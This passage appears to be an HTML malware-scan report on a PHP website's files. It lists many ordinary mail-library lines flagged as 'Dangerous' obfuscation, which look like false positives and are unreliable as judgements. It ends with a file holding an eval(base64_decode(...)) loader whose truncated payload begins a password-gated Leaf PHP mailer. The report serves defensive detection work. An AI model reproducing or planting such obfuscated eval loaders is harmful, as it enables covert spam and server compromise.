</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_99").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/fztfp.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:44:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:44:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_100" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
